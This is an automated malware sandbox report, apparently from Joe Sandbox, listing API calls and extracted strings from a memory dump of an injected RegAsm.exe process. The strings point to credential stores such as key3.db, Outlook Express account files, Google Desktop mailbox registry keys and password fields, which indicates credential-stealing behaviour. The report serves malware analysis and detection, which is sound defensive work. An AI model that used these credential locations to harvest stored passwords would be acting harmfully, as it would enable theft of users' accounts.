                                                                                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2374668499-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                Strings
                                                                                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                • free.MSVCRT ref: 00409B00
                                                                                                                                                                                  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                  • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                  • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                  • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                • String ID: $
                                                                                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID: Ul@$key3.db
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                • String ID: smtp
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                                                • String ID: S_@$l
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                Strings
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                                                • String ID: 3CD
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                                                                                • String ID: Password2
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: rows deleted
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen
                                                                                                                                                                                • String ID: >$>$>
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                • String ID: C@$mail.identity
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                                                                                • String ID: Ul@
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040B953
